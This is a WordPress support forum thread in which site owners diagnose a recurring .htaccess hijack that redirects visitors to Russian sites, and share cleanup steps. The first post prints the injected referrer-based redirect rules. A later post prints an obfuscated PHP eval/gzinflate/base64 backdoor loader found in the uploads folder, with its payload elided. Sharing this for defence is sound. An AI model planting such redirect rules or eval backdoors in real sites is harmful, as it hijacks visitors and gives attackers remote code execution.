Forums

WordPress › Support » How-To and Troubleshooting

.htaccess Hacked, Redirects to Russion Site (30 posts)

  1. ramirez_fabian
    Member
    Posted 1 year ago #

    I updated all sites to the recent WordPress 3.3.1

    Here is the code that keeps redirecting to a Russion site. I delete and it just reappears. I changed passwords in WordPress, changed my hosting password. Still it keeps appearing. Anything know how to get rid of it, or what plugin is causing this entry of hack?

    Code in .htaccess

    <IfModule mod_rewrite.c>
																														RewriteEngine On
																														RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
																														RewriteRule ^(.*)$ http://[ link redacted ] [R=301,L]
																														RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
																														RewriteRule ^(.*)$ http://[ link redacted ] [R=301,L]
																														</IfModule>																														

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

																														ErrorDocument 400 http://[ link redacted ]
																														ErrorDocument 401 http://[ link redacted ]
																														ErrorDocument 403 http://[ link redacted ]
																														ErrorDocument 404 http://[ link redacted ]
																														ErrorDocument 500 http://[ link redacted ]

  2. Jan Dembowski
    Volunteer Mod. & Brute Squad
    Posted 1 year ago #

    Here is the code that keeps redirecting to a Russion site. I delete and it just reappears.

    Sure. That's just treating the symptoms and is the equivalent of playing whack-a-mole.

    Anything know how to get rid of it, or what plugin is causing this entry of hack?

    This topic comes up a lot so please forgive me as I recycle a verbose version from here.

    You've a lot of work and reading ahead of you. You have already made a great start with password changes, if you haven't already give these a read.

    Backup everything and put that somewhere safe off of your server. This is your safety net.

    http://codex.wordpress.org/WordPress_Backups
    http://codex.wordpress.org/Backing_Up_Your_Database
    http://codex.wordpress.org/Restoring_Your_Database_From_Backup

    Once that's safely put away, give these a read.

    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

    When possible, you'll need to replace all of your files with good ones from the source. Once you've reached the Happy Placeā„¢ consider doing this.

    http://codex.wordpress.org/Hardening_WordPress

    It will make automated updates a manual thing (locking down the file system) but until your confident the site is secure that's probably not a bad thing. When you're convinced it's all good, then you can relax the file system restrictions back to normal.

    Good luck.

  3. RMelick
    Member
    Posted 1 year ago #

    Same thing going on over here - wordpress.org/support/topic/htaccess-hacked-redirects-to-russion-site?replies=2

  4. ramirez_fabian
    Member
    Posted 1 year ago #

    I've asked my hosting company (bluehost) to assist with determining the entry point and how to prevent it, but they cannot find this information out. We've backed up my files and restored but the .htaccess files keep getting infected with Russian code.

    It all happens at the same time, like 7:50am this morning, every .htaccess file was changed and code inserted, then it sets the permission to 444.

    I'm really getting annoyed by this.

  5. bh_WP_fan
    Member
    Posted 1 year ago #

    This isn't going to just go away by fixing your .htaccess and doing a little bit of cleanup work each time. You'll need to take some real cleanup and security and prevention measures.

    It will probably take some time to go over it and apply it, but it's better than wasting more and more time dealing with the hack over and over again.

    Go over the information Jan Dembowski provided for you.

    Remove any and all plugins/themes that you can possible afford to get rid of. I had an instance where an insecurity placed a vulnerability in an otherwise secure WP Super Cache, and then I had to clean that up as well. But trying to track it is difficult... Just remove anything you can afford to get rid of, and make sure everything else is up to date with the latest versions. (Don't just deactivate themes/plugins... actually delete them.)

    Re-upload all the core WordPress files, and do the same for your theme (if un-edited manually) and for your plugins, and replace the current files with the core files so any vulnerable files will be replaced.

    Read: https://my.bluehost.com/cgi/help/511

    And, again, read the information sent above.

  6. ramirez_fabian
    Member
    Posted 1 year ago #

    I logged into Bluehost, did a search on my hosting directory for thumb.php and timthumb.php.

    Looks like 5 of my sites had the thumb.php file and each one needed to be updated. I installed the timthumb vulnerability plugin on each site, and it automatically installed the most recent thumb.php file. So each site it up to date on that file as well as the most recent version of WordPress.

    The .htaccess was then hacked again.

    I found this article to be helpful

    http://www.hacksparrow.com/wordpress-hacked-getting-forwarded-to-distributioncorporate-ru-solution.html

    The article says this:

    Delete these files:
    /wp-content/uploads/_wp_cache.php
    /wp-content/uploads/sm3.php

    I did a search of sm3.php, and found no results. However when I did a search of _wp_cache.php, I found one file on one of the sites that had a thumb.php file that needed to be updated.

    I quickly deleted that file as the article mentioned, and so far so good. Now I'm going to go to each .htaccess file and delete the extra code and see if this does the trick.

    Fingers crossed on this one.

  7. ramirez_fabian
    Member
    Posted 1 year ago #

    The hack is back a day later with a different Russian site now. I'm not going to give up, although I want to. I have about 20 sites running via Bluehost. I just want to find the javascript or point of entry.

    My .htaccess are all changed at the same time today 5:04am. So this is an automatic script hitting my sites. Really bummed!

  8. lucaslshaffer
    Member
    Posted 1 year ago #

    Look at the same issue.

    Subscribing to follow thread.

  9. lucaslshaffer
    Member
    Posted 1 year ago #

    Found this.

    http://wordpress.org/support/topic/recurring-htaccess-hijack?replies=30

    "This same thing has been effecting 50+ sites in my hosting account for the last two days.

    The domains I have are a combination of WP, Joomla and simply hosted domains. They were all effected the same.

    I finally figured out how this was happening... In my case 3 of my WordPress installs were infected by a file either called wp_cache.php or simply _chache.php (as suggested by docarzt). For me they were located in wp-content/uploads/

    After I found and deleted all foreign files, and replaced the infected htaccess files, all went back to normal.

    It's been a several hours since an injection so I think I'm in the clear. Before, the files were getting infected again between 15-30 minutes.

    Hope this helps."

  10. lucaslshaffer
    Member
    Posted 1 year ago #

    Ok, found _cache.php in the uploads folder in the last site on my hosting. (go figure)

    Going to replace htaccess files and CHMOD them.

  11. ramirez_fabian
    Member
    Posted 1 year ago #

    CHMOD them.

    What does CHMOD them mean?

  12. Ipstenu (Mika Epstein)
    Half-Elf Support Rogue & Mod
    Posted 1 year ago #

    CHMOD means change mode. It's a unix thing.

  13. ramirez_fabian
    Member
    Posted 1 year ago #

    Ok, found _cache.php in the uploads folder in the last site on my hosting. (go figure)

    I too just found this same file, so I deleted it. It was on the last site that I installed on my hosting. The theme uses the thumb.php within the theme, but I installed the recent thumb.php file.

  14. garylnunn
    Member
    Posted 1 year ago #

    I've also been fighting this problem for days, and thanks to the above posts, I also found the files wp_cache.php and _cache.php in my wp-uploads directly. Of course they're both encrypted.

    I still want to know how they got there, and just as importantly, exactly which one of the scripts was calling those files?

  15. thecrow76
    Member
    Posted 1 year ago #

    Hi, well we use logic, if I place a permission to a file or -644 -444 should be possible to modify it, delete it. This is not happening in this case. Htaccess file is modified regardless of the permission.
    1 - is a hack that attacks the wp?
    2 - is a hack that attacks apache?

    for me to have a security level for the php apache probocado (wp) or plugins

    We can further analyze this case altogether?

    sorry my English is very bad

  16. Shadal
    Member
    Posted 1 year ago #

    For me, I found a strange looking WP-SYS.PHP file in the root directory of one of my wordpress 3.3.1 sites. I am/was getting ALL of my sites htaccess files modified, pointing to a .ru site. I've just deleted the file about 10 mins ago, so am hoping the hack has been stopped.

    Hope this works! Thanks for the infos...

  17. wpvince
    Member
    Posted 1 year ago #

    Did anyone find a solution?
    Thanks

  18. wpvince
    Member
    Posted 1 year ago #

    I was also told that putting the following line into htaccess would help
    RewriteRule \.ht[ap] - [NC,F]
    Thanks

  19. kmessinger
    Volunteer Moderator
    Posted 1 year ago #

    Did anyone find a solution?

    Scroll up and read Jan Dembowski's post.

  20. wpvince
    Member
    Posted 1 year ago #

    @kmessinger I did, but as this is not a WordPress specific issue, and I was looking for the cause rather just recovering after the problem.

    It seems everyone is at a loss right now as to how to stop it happening again.
    http://forum.joomla.org/viewtopic.php?f=432&t=705216&start=60#p2778501

  21. kmessinger
    Volunteer Moderator
    Posted 1 year ago #

    I was looking for the cause

    There is always a way to get in if someone wants to badly enough. Right now the shared servers most of us use makes it a lot easier.

    The war against hackers won't be won unless companies change the way they use computer networks. UPDATED with a comment provided by the FBI. http://www.tomsguide.com/us/Hackers-FBI-Shawn-Henry-Anonymous-LulzSec,news-14627.html

    http://codex.wordpress .org/Hardening_WordPress will help. Good karma will help.

  22. tommcgee
    Member
    Posted 11 months ago #

    Be sure to look up and down ALL the directories in your hosting. I found random .php files in several places in my directory tree, far away from where my WordPress installation was.

    Look for PHP files with strange names. Look for PHP files where they don't belong -- in directories by themselves, in image directories, in directories full of HTML files, with your error pages.

    Look at the modification dates especially. Sort the files in each directory by modification date. Chances are you'll see suspicious files modified in the last week or two in places where you know you weren't working.

    Wherever they are, they can go off and rewrite your .htaccess files.

  23. Piyush Labs
    Member
    Posted 11 months ago #

    Both /mylogin/.htaccess and /mylogin/public_html/.htaccess gets modified. Redirecting to random .ru websites.

    How did i miss this post. I was searching all around for the solution.
    Now, I found the wp-content\upload\_cache.php file with encrypted code and did some research.

    <?php
preg_replace("/.*/e","\x65\x76\x61\x6c\x20\x28\x20\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x20\x28\x20\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x20\x28'
.......
'\x29\x29\x20\x29\x20\x3b",".");?>

    It decodes to

    <?php
preg_replace("/.*/e","eval ( gzinflate ( base64_decode ('
........
')) ) ;",".");?>

    Running it on server, you can see it in action : a real Backdoor.
    This is just "one" example, there are many out there, with name other than "_cache.php" all due to this thumb.php lying there in some of my old inactive theme.

    Tired of this hack, facing since last 3 months, but there was no problem in viewing the site. I finally erased everything last night, and now rebuilding it again, after my site got black-listed in Google search. :(

  24. thoughton
    Member
    Posted 11 months ago #

    I encountered a very similar problem today. My htaccess file looks the very similar to the OPs.

    In my case there were no _cache.php files, but there was a mystery folder (named 'zreqgigkqvt') in the wp-content/plugins folder. This folder does not show up in the WordPress plugin list. Contents include edw.php and gsm.php, which contain PhpShel-G and PHPShell-A trojans respectively. It also contains several other random-character-name folders, all of which contain edw.php and lists of words to target (viagra, cialis, etc).

    edw.php also contains references to mx.hotmail.com and port 25.

  25. kozmic
    Member
    Posted 10 months ago #

    I found the same problem today, 1.: the htaccess looked nearly like this from ramirez_fabian above, 2.: there was a second index.php: called Index.php.
    3: I deleted all,but one hour later the htacces was once more corrupted, then i found a file ".000_cache.php" in the upload-folder, since i deleted this it works, but some security software still let the people not on my site.

    Excuse my bad english.

  26. boyhermes
    Member
    Posted 10 months ago #

    I had the same problem with the .httaccess files.

    I found the file _cache.php and I erased it. Also, I erased all the .htaccess files and replaced them with new empty ones.

    the problem was solved.

    It's better to erase all the data and install a fresh wordpress copy.

  27. Eddieman
    Member
    Posted 10 months ago #

    I recently started a WordPress site and now I find I'm getting emails warning me my site now has a 'registered new user'. In fact, I'm getting dozens of these advisory emails and when I log-on to my site I find I've got hundreds of posts for other sites/products.
    1- How can I block these people access to my site
    2 - I have found several Usernames listed on the log-in menu but only my password
    3 - How can I block my password from automatically coming up as soon as I hit my listed Username?

    Help! Please as I fear losing my site completely to all this SPAM stuff or someone smarter than me taking control of my domain and locking me out or doing something illegal.
    Eddieman.

  28. adesender
    Member
    Posted 10 months ago #

    I've been having the same issue as this for the last while as well. However in my case I wasn't able to locate a file any problematic files in the uploads. In the situation of my client I found code in the cgi folder off root and was named 'wp-xgqdi.php'.

    I've deleted the file, cleaned up the .htaccess files and notified Google of the resolution. I'll post in here if my issue is resolved.

  29. mortensn
    Member
    Posted 10 months ago #

    I found a _cache.php file hidden on my hosting account (Bluehost) on a site I haven't touched in over a year. Deleted the file and everything seems to be okay so far. (It's been 2 hours).

  30. adesender
    Member
    Posted 10 months ago #

    Just following up. Been a week since I removed the file and it is still clean.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags